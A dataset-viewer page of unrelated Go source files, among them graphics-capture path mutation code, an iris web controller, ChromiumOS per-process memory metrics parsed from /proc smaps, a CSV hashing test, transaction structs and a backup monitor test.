	case *path.MultiResourceData:
		// NOTE(review): the message below says "ResourceData" but the
		// expected type here is *api.MultiResourceData.
		data, ok := val.(*api.MultiResourceData)
		if !ok {
			return nil, fmt.Errorf("Expected ResourceData, got %T", val)
		}
		c, err := changeResources(ctx, a, p.After, p.IDs, data.Resources, r)
		if err != nil {
			return nil, err
		}
		return &path.MultiResourceData{
			IDs: p.IDs, // TODO: Shouldn't this change?
			After: &path.Command{
				Capture: c,
				Indices: p.After.Indices,
			},
		}, nil
	case *path.ResourceData:
		data, ok := val.(*api.ResourceData)
		if !ok {
			return nil, fmt.Errorf("Expected ResourceData, got %T", val)
		}
		c, err := changeResources(ctx, a, p.After, []*path.ID{p.ID}, []*api.ResourceData{data}, r)
		if err != nil {
			return nil, err
		}
		return &path.ResourceData{
			ID: p.ID, // TODO: Shouldn't this change?
			After: &path.Command{
				Capture: c,
				Indices: p.After.Indices,
			},
		}, nil
	case *path.Command:
		cmdIdx := p.Indices[0]
		if len(p.Indices) > 1 {
			return nil, fmt.Errorf("Cannot modify subcommands") // TODO: Subcommands
		}
		// Resolve the command list
		oldCmds, err := NCmds(ctx, p.Capture, cmdIdx+1)
		if err != nil {
			return nil, err
		}
		// Validate the value
		if val == nil {
			return nil, fmt.Errorf("Command cannot be nil")
		}
		cmd, ok := val.(api.Cmd)
		if !ok {
			return nil, fmt.Errorf("Expected Cmd, got %T", val)
		}
		// Clone the command list
		cmds := make([]api.Cmd, len(oldCmds))
		copy(cmds, oldCmds)
		// Propagate extras if the new command omitted them
		oldCmd := oldCmds[cmdIdx]
		if len(cmd.Extras().All()) == 0 {
			cmd.Extras().Add(oldCmd.Extras().All()...)
		}
		// Propagate caller (not exposed to client)
		cmd.SetCaller(oldCmd.Caller())
		// Replace the command
		cmds[cmdIdx] = cmd
		// Store the new command list
		c, err := changeCommands(ctx, a, p.Capture, cmds)
		if err != nil {
			return nil, err
		}
		return &path.Command{
			Capture: c,
			Indices: p.Indices,
		}, nil
	case *path.Commands:
		return nil, fmt.Errorf("Commands can not be changed directly")
	case *path.State:
		return nil, fmt.Errorf("State can not currently be mutated")
	case *path.Field, *path.Parameter, *path.ArrayIndex, *path.MapIndex:
		// Leaf kinds: fetch the parent's current value, clone it, mutate the
		// clone, then recurse on the parent with the modified value.
		oldObj, err := ResolveInternal(ctx, p.Parent(), r)
		if err != nil {
			return nil, err
		}
		obj, err := clone(reflect.ValueOf(oldObj))
		if err != nil {
			return nil, err
		}
		switch p := p.(type) {
		case *path.Parameter:
			// TODO: Deal with parameters belonging to sub-commands.
			cmd := obj.Interface().(api.Cmd)
			err := api.SetParameter(cmd, p.Name, val)
			switch err {
			case nil:
			case api.ErrParameterNotFound:
				return nil, &service.ErrInvalidPath{
					Reason: messages.ErrParameterDoesNotExist(cmd.CmdName(), p.Name),
					Path:   p.Path(),
				}
			default:
				return nil, err
			}
			parent, err := change(ctx, a, p.Parent(), obj.Interface(), r)
			if err != nil {
				return nil, err
			}
			return parent.(*path.Command).Parameter(p.Name), nil
		case *path.Result:
			// NOTE(review): *path.Result is not listed in the enclosing
			// case's type set, so this branch appears unreachable — confirm
			// whether Result should be added to the outer case.
			// TODO: Deal with parameters belonging to sub-commands.
			cmd := obj.Interface().(api.Cmd)
			err := api.SetResult(cmd, val)
			switch err {
			case nil:
			case api.ErrResultNotFound:
				return nil, &service.ErrInvalidPath{
					Reason: messages.ErrResultDoesNotExist(cmd.CmdName()),
					Path:   p.Path(),
				}
			default:
				return nil, err
			}
			parent, err := change(ctx, a, p.Parent(), obj.Interface(), r)
			if err != nil {
				return nil, err
			}
			return parent.(*path.Command).Result(), nil
		case *path.Field:
			parent, err := setField(ctx, a, obj, reflect.ValueOf(val), p.Name, p, r)
			if err != nil {
				return nil, err
			}
			out := &path.Field{Name: p.Name}
			out.SetParent(parent)
			return out, nil
		case *path.ArrayIndex:
			arr, ty := obj, obj.Type()
			switch arr.Kind() {
			case reflect.Array, reflect.Slice:
				ty = ty.Elem()
			case reflect.String:
			default:
				return nil, &service.ErrInvalidPath{
					Reason: messages.ErrTypeNotArrayIndexable(typename(arr.Type())),
					Path:   p.Path(),
				}
			}
			val, ok := convert(reflect.ValueOf(val), ty)
			if !ok {
				return nil, fmt.Errorf("Slice or array at %s has element of type %v, got type %v",
					p.Parent(), ty, val.Type())
			}
			// NOTE(review): if arr is empty, count-1 underflows in the
			// unsigned error arguments below — presumably arrays addressed
			// by a valid path are non-empty; confirm.
			if count := uint64(arr.Len()); p.Index >= count {
				return nil, errPathOOB(p.Index, "Index", 0, count-1, p)
			}
			if err := assign(arr.Index(int(p.Index)), val); err != nil {
				return nil, err
			}
			parent, err := change(ctx, a, p.Parent(), arr.Interface(), r)
			if err != nil {
				return nil, err
			}
			p = &path.ArrayIndex{Index: p.Index}
			p.SetParent(parent)
			return p, nil
		case *path.MapIndex:
			d := dictionary.From(obj.Interface())
			if d == nil {
				return nil, &service.ErrInvalidPath{
					Reason: messages.ErrTypeNotMapIndexable(typename(obj.Type())),
					Path:   p.Path(),
				}
			}
			keyTy, valTy := d.KeyTy(), d.ValTy()
			key, ok := convert(reflect.ValueOf(p.KeyValue()), keyTy)
			if !ok {
				return nil, &service.ErrInvalidPath{
					Reason: messages.ErrIncorrectMapKeyType(
						typename(reflect.TypeOf(p.KeyValue())), // got
						typename(keyTy)),                       // expected
					Path: p.Path(),
				}
			}
			val, ok := convert(reflect.ValueOf(val), d.ValTy())
			if !ok {
				return nil, fmt.Errorf("Map at %s has value of type %v, got type %v",
					p.Parent(), valTy, val.Type())
			}
			d.Add(key.Interface(), val.Interface())
			parent, err := change(ctx, a, p.Parent(), obj.Interface(), r)
			if err != nil {
				return nil, err
			}
			p = &path.MapIndex{Key: p.Key}
			p.SetParent(parent)
			return p, nil
		}
	}
	return nil, fmt.Errorf("Unknown path type %T", p)
}
// changeResources creates a new capture in which the resources identified by
// ids (as observed at command after) have been replaced with data, and
// returns the path to the new capture.
func changeResources(ctx context.Context, a arena.Arena, after *path.Command, ids []*path.ID, data []*api.ResourceData, r *path.ResolveConfig) (*path.Capture, error) {
	meta, err := ResourceMeta(ctx, ids, after, r)
	if err != nil {
		return nil, err
	}
	if len(meta.Resources) != len(ids) {
		return nil, fmt.Errorf("Expected %d resource(s), got %d", len(ids), len(meta.Resources))
	}
	cmdIdx := after.Indices[0]
	// If we change resource data, subcommands do not affect this, so change
	// the main command.
	oldCmds, err := NCmds(ctx, after.Capture, cmdIdx+1)
	if err != nil {
		return nil, err
	}
	// Work on a copy of the command list so the original capture's commands
	// are never mutated.
	cmds := make([]api.Cmd, len(oldCmds))
	copy(cmds, oldCmds)
	replaceCommands := func(where uint64, with interface{}) {
		cmds[where] = with.(api.Cmd)
	}
	oldCapt, err := capture.ResolveGraphicsFromPath(ctx, after.Capture)
	if err != nil {
		return nil, err
	}
	// The initial state is cloned lazily, only if some resource asks to
	// mutate it.
	var initialState *capture.InitialState
	mutateInitialState := func(API api.API) api.State {
		if initialState == nil {
			if initialState = oldCapt.CloneInitialState(a); initialState == nil {
				return nil
			}
		}
		return initialState.APIs[API]
	}
	for i, resource := range meta.Resources {
		if err := resource.SetResourceData(
			ctx,
			after,
			data[i],
			meta.IDMap,
			replaceCommands,
			mutateInitialState,
			r); err != nil {
			return nil, err
		}
	}
	// No resource touched the initial state: reuse the old one unchanged.
	if initialState == nil {
		initialState = oldCapt.InitialState
	}
	gc, err := capture.NewGraphicsCapture(ctx, a, oldCapt.Name()+"*", oldCapt.Header, initialState, cmds)
	if err != nil {
		return nil, err
	}
	// (Removed the redundant else-after-return around this tail call.)
	return capture.New(ctx, gc)
}
// changeCommands builds a new capture identical to p's, but with its command
// list replaced by newCmds, and returns the path to the new capture.
func changeCommands(ctx context.Context, a arena.Arena, p *path.Capture, newCmds []api.Cmd) (*path.Capture, error) {
	src, err := capture.ResolveGraphicsFromPath(ctx, p)
	if err != nil {
		return nil, err
	}
	// The clone keeps the source's header and initial state; only the
	// commands differ. Its name gains a "*" suffix.
	dup, err := capture.NewGraphicsCapture(ctx, a, src.Name()+"*", src.Header, src.InitialState, newCmds)
	if err != nil {
		return nil, err
	}
	return capture.New(ctx, dup)
}
// setField assigns val into the field called name of the struct value str,
// then rebuilds the parent path so it refers to the modified object.
func setField(
	ctx context.Context,
	a arena.Arena,
	str,
	val reflect.Value,
	name string,
	p path.Node,
	r *path.ResolveConfig) (path.Node, error) {
	target, err := field(ctx, str, name, p)
	if err != nil {
		return nil, err
	}
	if err = assign(target, val); err != nil {
		return nil, err
	}
	return change(ctx, a, p.Parent(), str.Interface(), r)
}
// clone returns a fresh, settable value of v's type containing a shallow
// copy of v. Slices and maps get new backing storage at the top level; all
// other kinds get a new zero value that is then shallow-copied into.
func clone(v reflect.Value) (reflect.Value, error) {
	var out reflect.Value
	switch v.Kind() {
	case reflect.Slice:
		out = reflect.MakeSlice(v.Type(), v.Len(), v.Len())
	case reflect.Map:
		out = reflect.MakeMap(v.Type())
	default:
		out = reflect.New(v.Type()).Elem()
	}
	err := shallowCopy(out, v)
	return out, err
}
func shallowCopy(dst, src reflect.Value) error {
switch dst.Kind() {
case reflect.Ptr, reflect.Interface:
if !src.IsNil() {
o := reflect.New(src.Elem().Type())
shallowCopy(o.Elem(), src.Elem())
dst.Set(o)
}
case reflect.Slice, reflect.Array:
reflect.Copy(dst, src)
case reflect.Map:
for _, k := range src.MapKeys() {
val := src.MapIndex(k)
dst.SetMapIndex(k, val)
}
default:
dst.Set(src)
}
return nil
}
// assign deep-copies src into dst via deep.Copy.
// dst must be settable (i.e. obtained from an addressable value), otherwise
// an error is returned.
func assign(dst, src reflect.Value) error {
	if !dst.CanSet() {
		return fmt.Errorf("Value is unassignable")
	}
	return deep.Copy(dst.Addr().Interface(), src.Interface())
}
|
package pretend
//lint:file-ignore U1000 Ignore all unused code
// Assignment is a canned JSON document (a "content_groups" payload) used as
// stub data by this package.
const Assignment = `{
	"content_groups": [
		[
			{
				"label": "content_group_label",
				"value": [
					"string",
					"details"
				]
			},
			{
				"label": "title",
				"value": [
					"string",
					"Blacksmith - Menaro District"
				]
			},
			{
				"label": "description",
				"value": [
					"string",
					"Specialize in strong iron found natively in and around Menaro"
				]
			},
			{
				"label": "time_share_x100",
				"value": [
					"int64",
					100
				]
			},
			{
				"label": "deferred_perc_x100",
				"value": [
					"int64",
					100
				]
			}
		]
	]
}`
|
package controller
import (
"github.com/kataras/iris/mvc"
"xdream/example/webserver/data/api"
"xdream/web"
"fmt"
"github.com/kataras/iris"
"xdream/example/webserver/middleware"
"xdream/logger"
)
// IndexController serves the index routes. cnt counts GetHello invocations
// across requests. NOTE(review): cnt is mutated without synchronization —
// confirm the MVC framework serializes access before relying on its value.
type IndexController struct {
	BaseController
	cnt int
}
// init registers the controller at the root path with its per-controller
// middleware handler.
func init() {
	web.RegisterController(new(IndexController), "", middleware.PerControllerHandler)
}
// AfterActivation is called once, after the controller's routes have been
// registered and before the server starts serving. It looks up the route
// bound to GetHello and prepends a per-action middleware handler to it.
// (The previous comment incorrectly described BeforeActivation.)
func (c *IndexController) AfterActivation(b mvc.AfterActivation) {
	// select the route based on the method name you want to
	// modify.
	index := b.GetRoute("GetHello")
	// just prepend the handler(s) as middleware(s) you want to use.
	// or append for "done" handlers.
	index.Handlers = append([]iris.Handler{middleware.PerActionHandler}, index.Handlers...)
	fmt.Println("============AfterActivation ")
	//log.Printf("request url:%s timeUsed:%v \n", c.Ctx.Request().RequestURI, time.Since(c.StartTime))
}
// GetHello builds a stub UserInfo response, embedding the per-controller
// call counter in the message, and increments the counter.
// (Reformatted to be gofmt-clean: receiver spacing and redundant result
// parentheses fixed.)
func (c *IndexController) GetHello() mvc.Result {
	c.Ctx.Application().Logger().Infof("action execute")
	res := api.UserInfo{}
	res.RespInfo.Code = 100
	res.RespInfo.Msg = fmt.Sprintf("ok:%d", c.cnt)
	res.User.Id = "abc"
	res.User.Name = "fank xu"
	c.cnt++
	return c.ObjectResponse(res)
}
// GetLog exercises both the iris application logger and the zap logger at
// debug and info levels, then returns an empty response payload.
// (Reformatted to be gofmt-clean.)
func (c *IndexController) GetLog() mvc.Result {
	web.App.Logger().Debugf("[iris] debug msg")
	web.App.Logger().Info("[iris] info msg")
	logger.ZLogger.Debug("[zap] debug msg")
	logger.ZLogger.Info("[zap] info msg")
	return c.ObjectResponse(web.RespInfo{})
}
func (c *IndexController)GetPanic() {
panic("abc")
} |
// Copyright 2021 The ChromiumOS Authors
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
package memory
import (
"context"
"encoding/json"
"fmt"
"io/ioutil"
"path"
"regexp"
"strconv"
"strings"
"github.com/shirou/gopsutil/v3/process"
"golang.org/x/sync/errgroup"
"chromiumos/tast/common/perf"
"chromiumos/tast/errors"
"chromiumos/tast/local/memory/kernelmeter"
"chromiumos/tast/testing"
)
// NameToCategoryMetricsMap maps a process category name to its key PSS metrics.
type NameToCategoryMetricsMap map[string]*CategoryHostMetrics

// CategoryHostMetrics has a summary of host HostMetrics
// we keep on a per-category basis for reporting.
// All values in Kilobytes.
type CategoryHostMetrics struct {
	Pss      uint64 // summed Pss of the category's processes
	PssSwap  uint64 // summed SwapPss, including the shared-mapping swap share
	PssGuest uint64 // summed crosvm_guest Pss (VM memory mapped on the host)
}

// HostSummary captures a few key data items that are used to compute
// overall system memory status.
// All values are expressed in Kilobytes.
type HostSummary struct {
	MemTotal         uint64
	MemFree          uint64
	HostCachedKernel uint64
	CategoryMetrics  NameToCategoryMetricsMap
}

// SharedInfo holds shared memory use information for one process.
// SharedSwapPss is the amount of swap used by shared memory regions divided by
// the number of times those regions are mapped.
// CrosvmGuestPss is the sum of the Pss used by the crosvm_guest region,
// (which means memory from the VM mapped on the host).
type SharedInfo struct {
	SharedSwapPss  uint64
	CrosvmGuestPss uint64
}

// NamedSmapsRollup is a SmapsRollup plus the process name and ID, and
// information on shared memory use (Shared field).
type NamedSmapsRollup struct {
	Command string
	Pid     int32
	Shared  *SharedInfo
	Rollup  map[string]uint64
}

// SharedInfoMap maps process ids to shared memory information.
type SharedInfoMap map[int32]*SharedInfo

// smapsRollupRE matches one "<Field>:  <n> kB" line of a smaps_rollup file,
// capturing the field name and the numeric (kB) value.
var smapsRollupRE = regexp.MustCompile(`(?m)^([^:]+):\s*(\d+)\s*kB$`)
// NewSmapsRollup parses the contents of a /proc/<pid>/smaps_rollup file into
// a field-name -> value map. Values are the raw numbers taken from each
// "<Field>: <n> kB" line, i.e. in kB — no unit conversion is performed
// (the previous comment's claim that sizes are in bytes was incorrect).
func NewSmapsRollup(smapsRollupFileData []byte) (map[string]uint64, error) {
	result := make(map[string]uint64)
	matches := smapsRollupRE.FindAllSubmatch(smapsRollupFileData, -1)
	if matches == nil {
		return nil, errors.Errorf("failed to parse smaps_rollup file %q", string(smapsRollupFileData))
	}
	for _, match := range matches {
		field := string(match[1])
		kbString := string(match[2])
		kb, err := strconv.ParseUint(kbString, 10, 64)
		if err != nil {
			return nil, errors.Wrapf(err, "failed to parse %q value from smaps_rollup: %q", field, kbString)
		}
		result[field] = kb
	}
	return result, nil
}
// smapsRollups returns a NamedSmapsRollup for every process in processes
// whose smaps_rollup could be read; rollup values are in kB as parsed.
// The Shared field is initialized from sharedInfoMap, if provided.
// NOTE(review): the summary argument is not referenced in this function —
// confirm whether it can be removed or was meant to be filled here.
func smapsRollups(ctx context.Context, processes []*process.Process, sharedInfoMap SharedInfoMap, summary *HostSummary) ([]*NamedSmapsRollup, error) {
	// One slot per process; slots stay nil for processes we fail to read.
	rollups := make([]*NamedSmapsRollup, len(processes))
	g, ctx := errgroup.WithContext(ctx)
	for index, process := range processes {
		// All these are captured by value in the closure - and that is what we want.
		i := index
		p := process
		g.Go(func() error {
			// We're racing with this process potentially exiting, so just
			// ignore errors and don't generate a NamesSmapsRollup if we fail to
			// read anything from proc.
			smapsData, err := ioutil.ReadFile(fmt.Sprintf("/proc/%d/smaps_rollup", p.Pid))
			if err != nil {
				// Not all processes have a smaps_rollup, this process may have
				// exited.
				return nil
			} else if len(smapsData) == 0 {
				// On some processes, smaps_rollups exists but is empty.
				return nil
			}
			command, err := p.Cmdline()
			if err != nil {
				// Process may have died between reading smapsData and now, so
				// just ignore errors here.
				testing.ContextLogf(ctx, "SmapsRollups failed to get Cmdline for process %d: %s", p.Pid, err)
				return nil
			}
			rollup, err := NewSmapsRollup(smapsData)
			if err != nil {
				return errors.Wrapf(err, "failed to parse /proc/%d/smaps_rollup", p.Pid)
			}
			rollups[i] = &NamedSmapsRollup{
				Command: command,
				Pid:     p.Pid,
				Rollup:  rollup,
				Shared:  sharedInfoMap[p.Pid],
			}
			return nil
		})
	}
	if err := g.Wait(); err != nil {
		return nil, errors.Wrap(err, "failed to wait for all smaps_rollup parsing to be done")
	}
	// Compact away the nil slots left by skipped processes.
	var result []*NamedSmapsRollup
	for _, rollup := range rollups {
		if rollup != nil {
			result = append(result, rollup)
		}
	}
	return result, nil
}
// sharedSwapPssRE matches smaps entries that are mapped shared (the "s"
// permission flag), with the following match groups (the previous comment's
// numbering was off by one):
// [1] The inode number of the mapped file.
// [2] The name of the mapping.
// [3] The RSS for that mapping within this process, in kiB.
// [4] The PSS for that mapping within this process, in kiB.
// [5] The size of swapped out pages in the mapping, in kiB.
var sharedSwapPssRE = regexp.MustCompile(`(?m)^[[:xdigit:]]+-[[:xdigit:]]+ [-r][-w][-x]s [[:xdigit:]]+ [[:xdigit:]]+:[[:xdigit:]]+ ([\d]+) +(\S[^\n]*)$
(?:^\w+: +[^\n]+$
)*^Rss: +(\d+) kB$
(?:^\w+: +[^\n]+$
)*^Pss: +(\d+) kB$
(?:^\w+: +[^\n]+$
)*^Swap: +(\d+) kB$`)
// SharedMapping contains information parsed from a smaps entry. Numbers are KiB.
type SharedMapping struct {
	name  string // mapping name, e.g. a file path or /memfd: label
	swap  uint64 // Swap: swapped-out pages of the mapping
	pss   uint64 // Pss: proportional set size
	rss   uint64 // Rss: resident set size
	inode uint64 // inode of the backing file
}
// ParseSmapsData parses the given smaps data, returning one SharedMapping
// per shared ("s"-flagged) mapping found. All sizes are in KiB.
func ParseSmapsData(data []byte) ([]SharedMapping, error) {
	var mappings []SharedMapping
	matches := sharedSwapPssRE.FindAllSubmatch(data, -1)
	for _, match := range matches {
		// Group order: [1] inode, [2] name, [3] Rss, [4] Pss, [5] Swap.
		inode, err := strconv.ParseUint(string(match[1]), 10, 64)
		if err != nil {
			return nil, errors.Wrapf(err, "failed to parse inode %q", match[1])
		}
		name := string(match[2])
		rss, err := strconv.ParseUint(string(match[3]), 10, 64)
		if err != nil {
			return nil, errors.Wrapf(err, "failed to parse rss value %q", match[3])
		}
		pss, err := strconv.ParseUint(string(match[4]), 10, 64)
		if err != nil {
			return nil, errors.Wrapf(err, "failed to parse pss value %q", match[4])
		}
		swap, err := strconv.ParseUint(string(match[5]), 10, 64)
		if err != nil {
			return nil, errors.Wrapf(err, "failed to parse swap value %q", match[5])
		}
		// Use a keyed literal (and drop the redundant rename locals the old
		// code had) so field order mistakes are impossible.
		mappings = append(mappings, SharedMapping{
			name:  name,
			swap:  swap,
			pss:   pss,
			rss:   rss,
			inode: inode,
		})
	}
	return mappings, nil
}
// makeSharedInfoMap creates a map from Pid to the amount of SwapPss used by shared
// mappings per process. The SwapPss field in smaps_rollup does not include
// memory swapped out of shared mappings. In order to calculate a complete
// SwapPss, we parse smaps for all shared mappings in all processes, and then
// divide their "Swap" value by the number of times the shared memory is mapped.
// It also accumulates each process's share of crosvm_guest mapping Pss.
func makeSharedInfoMap(ctx context.Context, processes []*process.Process) (SharedInfoMap, error) {
	g, ctx := errgroup.WithContext(ctx)
	// One parsed-smaps slice per process, indexed in parallel with processes.
	procSwaps := make([][]SharedMapping, len(processes))
	for index, process := range processes {
		// Captured by value for the goroutine closure below.
		i := index
		pid := process.Pid
		g.Go(func() error {
			smapsData, err := ioutil.ReadFile(fmt.Sprintf("/proc/%d/smaps", pid))
			if err != nil {
				// Not all processes have a readable smaps, this process may
				// have exited. (Previous comment said "smaps_rollup".)
				return nil
			}
			smaps, err := ParseSmapsData(smapsData)
			if err != nil {
				return err
			}
			procSwaps[i] = smaps
			return nil
		})
	}
	if err := g.Wait(); err != nil {
		return nil, errors.Wrap(err, "failed to wait for all smaps parsing to be done")
	}
	// Count how many times each shared mapping has been mapped.
	mapCount := make(map[string]uint64)
	for _, swaps := range procSwaps {
		for _, swap := range swaps {
			mapCount[swap.name]++
		}
	}
	// Use the counts to divide each mapping's swap size to compute SwapPss.
	// Also stack up each process's share of the crosvm_guest mapping
	sharedInfoMap := make(SharedInfoMap)
	for i, swaps := range procSwaps {
		pid := processes[i].Pid
		sharedInfo := &SharedInfo{}
		sharedInfoMap[pid] = sharedInfo
		for _, swap := range swaps {
			if strings.HasPrefix(swap.name, "/memfd:crosvm_guest") {
				sharedInfo.CrosvmGuestPss += swap.pss
			}
			// mapCount[swap.name] is always >= 1 here since this very
			// mapping was counted above.
			sharedInfo.SharedSwapPss += swap.swap / mapCount[swap.name]
		}
	}
	return sharedInfoMap, nil
}
// processCategory pairs a category name with the regexp that selects
// processes (by command line) belonging to it.
type processCategory struct {
	commandRE *regexp.Regexp
	name      string
}

// processCategories defines categories used to aggregate per-process memory
// metrics. The first commandRE to match a process' command line defines its
// category, so order matters: more specific patterns come first, and the
// final catch-all "other" matches everything remaining.
var processCategories = []processCategory{
	{
		commandRE: regexp.MustCompile(`^/usr/bin/crosvm run.*/arcvm.sock`),
		name:      "crosvm_arcvm",
	}, {
		commandRE: regexp.MustCompile(`^/usr/bin/crosvm`),
		name:      "crosvm_other",
	}, {
		commandRE: regexp.MustCompile(`^/opt/google/chrome/chrome.*--type=renderer`),
		name:      "chrome_renderer",
	}, {
		commandRE: regexp.MustCompile(`^/opt/google/chrome/chrome.*--type=gpu-process`),
		name:      "chrome_gpu",
	}, {
		commandRE: regexp.MustCompile(`^/opt/google/chrome/chrome.*--type=`),
		name:      "chrome_other",
	}, { // The Chrome browser is the only chrome without a --type argument.
		commandRE: regexp.MustCompile(`^/opt/google/chrome/chrome`),
		name:      "chrome_browser",
	}, {
		commandRE: regexp.MustCompile(`.*`),
		name:      "other",
	},
}
// GetHostMetrics parses smaps and smaps_rollup information from every
// running process on the ChromeOS (host) side.
// Values are summarized according to the processCategories defined above and
// returned in the HostSummary structure.
// If outdir is provided, detailed rollup information is also written
// to files in that directory (named smaps_rollup<suffix>.json).
func GetHostMetrics(ctx context.Context, outdir, suffix string) (*HostSummary, error) {
	processes, err := process.Processes()
	if err != nil {
		return nil, errors.Wrap(err, "failed to get all processes")
	}
	// Per-process shared-memory info, computed from smaps.
	sharedInfoMap, err := makeSharedInfoMap(ctx, processes)
	if err != nil {
		return nil, err
	}
	summary := &HostSummary{CategoryMetrics: make(NameToCategoryMetricsMap)}
	rollups, err := smapsRollups(ctx, processes, sharedInfoMap, summary)
	if err != nil {
		return nil, err
	}
	meminfo, err := kernelmeter.ReadMemInfo()
	if err != nil {
		return nil, err
	}
	if len(outdir) > 0 {
		// Dump intermediate data.
		rollupsJSON, err := json.MarshalIndent(rollups, "", "  ")
		if err != nil {
			return nil, errors.Wrap(err, "failed to convert smaps_rollups to JSON")
		}
		filename := fmt.Sprintf("smaps_rollup%s.json", suffix)
		if err := ioutil.WriteFile(path.Join(outdir, filename), rollupsJSON, 0644); err != nil {
			return nil, errors.Wrapf(err, "failed to write smaps_rollups to %s", filename)
		}
	}
	// Convert reported totals in bytes into the common KiB unit.
	summary.MemTotal = uint64(meminfo["MemTotal"]) / KiB
	summary.MemFree = uint64(meminfo["MemFree"]) / KiB
	summary.HostCachedKernel = uint64(meminfo["SReclaimable"]+meminfo["Buffers"]+meminfo["Cached"]-meminfo["Mapped"]) / KiB
	metrics := summary.CategoryMetrics // Shallow copy, as it is a map.
	for _, rollup := range rollups {
		for _, category := range processCategories {
			if category.commandRE.MatchString(rollup.Command) {
				metric := metrics[category.name]
				if metric == nil {
					// This is the first time seeing this category, so add it as zeroes.
					metric = &CategoryHostMetrics{}
					metrics[category.name] = metric
				}
				pss, ok := rollup.Rollup["Pss"]
				if !ok {
					return nil, errors.Errorf("smaps_rollup for process %d does not include Pss", rollup.Pid)
				}
				swapPss, ok := rollup.Rollup["SwapPss"]
				if !ok {
					return nil, errors.Errorf("smaps_rollup for process %d does not include SwapPss", rollup.Pid)
				}
				// Accumulate the rollup's PSS, its SwapPss plus the shared
				// swap share, and the crosvm_guest PSS when shared info is
				// available for this process.
				metric.Pss += pss
				metric.PssSwap += swapPss
				if rollup.Shared != nil {
					metric.PssSwap += rollup.Shared.SharedSwapPss
					metric.PssGuest += rollup.Shared.CrosvmGuestPss
				}
				// Only the first matching category should contain this process.
				break
			}
		}
	}
	return summary, nil
}
// ReportHostMetrics outputs a set of representative metrics
// into the supplied performance data dictionary. Per-category values are
// converted from KiB to MiB for reporting.
func ReportHostMetrics(summary *HostSummary, p *perf.Values, suffix string) {
	for name, value := range summary.CategoryMetrics {
		// report factors out the three previously copy-pasted p.Set calls;
		// the metric names it produces ("<name><suffix>_<metric>") are
		// identical to before.
		report := func(metric string, kib uint64) {
			p.Set(
				perf.Metric{
					Name:      fmt.Sprintf("%s%s_%s", name, suffix, metric),
					Unit:      "MiB",
					Direction: perf.SmallerIsBetter,
				},
				float64(kib)/KiBInMiB,
			)
		}
		report("pss", value.Pss)
		report("pss_swap", value.PssSwap)
		report("pss_total", value.Pss+value.PssSwap)
	}
}
|
package hashy
import (
"fmt"
"testing"
)
// config is the shared fixture used by every test and benchmark in this
// file; alternate inputs are kept below as commented-out options.
// NOTE(review): the active input is a 1GB local fixture that is unlikely to
// exist outside the author's machine — confirm before running in CI.
var config = Options{
	// Input: "./_/short.csv",
	// Input: "./_/long.csv",
	// Input: "./_/no_valid.csv",
	Input:             "./_/1gb.csv",
	KeyColumns:        []int{1},
	SkipHeader:        false,
	Delimiter:         ',',
	IncludeKeysValues: false,
}
// TestFile checks that File hashes the configured CSV without error, then
// prints a sample entry for manual inspection.
func TestFile(t *testing.T) {
	hash, err := File(config)
	if err != nil {
		// Previously the error was only printed and the test still passed;
		// fail fast instead.
		t.Fatalf("csv file error: %v", err)
	}
	fmt.Println("total:", len(hash))
	for key, val := range hash {
		fmt.Println(key)
		for _, f := range val {
			fmt.Println("\t", fmt.Sprintf("%q", f))
		}
		break
	}
}
// TestFileFlat checks that FileFlat hashes the configured CSV without error,
// then prints a sample entry for manual inspection.
func TestFileFlat(t *testing.T) {
	hash, err := FileFlat(config)
	if err != nil {
		// Previously the error was only printed and the test still passed;
		// fail fast instead.
		t.Fatalf("csv file error: %v", err)
	}
	fmt.Println("total:", len(hash))
	for key, val := range hash {
		fmt.Println(key, ":", val)
		break
	}
}
// Run with -benchmem to also report allocations.
// BenchmarkModuleName measures File over the configured fixture.
// NOTE(review): the name looks like a leftover template placeholder, and the
// result/error are discarded — consider renaming and sinking the result.
func BenchmarkModuleName(b *testing.B) {
	for i := 0; i < b.N; i++ {
		File(config)
	}
}
|
package entity
// Log is one event log entry attached to a transaction.
// NOTE(review): the JSON tag is singular "topic" while the field is Topics —
// confirm against the wire format before changing either.
type Log struct {
	Topics []string `json:"topic"`
	Data   []byte   `json:"data"`
}

// Transaction is a JSON transaction record; the field set (blockHash, gas,
// nonce, r/s/v, etc.) suggests an Ethereum-style RPC payload, with all
// numeric fields carried as strings. OriginTransaction holds the raw source
// object and is excluded from JSON.
type Transaction struct {
	BlockHash        string      `json:"blockHash"`
	BlockNumber      string      `json:"blockNumber"`
	Gas              string      `json:"gas"`
	GasPrice         string      `json:"gasPrice"`
	Hash             string      `json:"hash"`
	Input            string      `json:"input"`
	Nonce            string      `json:"nonce"`
	R                string      `json:"r"`
	S                string      `json:"s"`
	From             string      `json:"from"`
	To               string      `json:"to"`
	TransactionIndex string      `json:"transactionIndex"`
	Type             string      `json:"type"`
	V                string      `json:"v"`
	Value            string      `json:"value"`
	OriginTransaction interface{} `json:"-"`
	Success          bool        `json:"Success"`
	Logs             []*Log      `json:"Logs"`
}
|
package utils
import (
"github.com/gin-gonic/gin"
"github.com/life-assistant-go/middleware"
)
// Router is the globally shared gin engine, initialized once at package
// load time with the request-logging middleware installed.
var Router *gin.Engine

// init builds the shared engine. Release mode is left commented out for
// development.
func init() {
	// release mode
	// gin.SetMode(gin.ReleaseMode)
	r := gin.New()
	r.Use(middleware.Logger())
	Router = r
}
|
package fs_backup_test
import (
"github.com/stretchr/testify/require"
"github.com/zucchinidev/fs_backup"
"strings"
"testing"
)
// archiver is the fake Archiver shared with the monitor under test; it
// records every Archive call so the test can inspect the destinations.
var archiver *TestArchiver

// TestMonitor verifies that Monitor.Now archives both configured paths,
// records one Archive call per path, and writes each archive as a .zip
// under the configured destination directory.
func TestMonitor(t *testing.T) {
	archiver = &TestArchiver{}
	monitor := &fs_backup.Monitor{
		Destination: "test/archive",
		Paths: map[string]string{
			// path -> last-seen hash; both differ from the current state so
			// both should be re-archived.
			"test/hash1": "abc",
			"test/hash2": "def",
		},
		Archiver: archiver,
	}
	numOfCompressedFiles, err := monitor.Now()
	require.NoError(t, err)
	require.Equal(t, 2, numOfCompressedFiles)
	require.Equal(t, 2, len(archiver.Archives))
	for _, call := range archiver.Archives {
		require.True(t, strings.HasPrefix(call.Dest, monitor.Destination))
		require.True(t, strings.HasSuffix(call.Dest, ".zip"))
	}
}
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.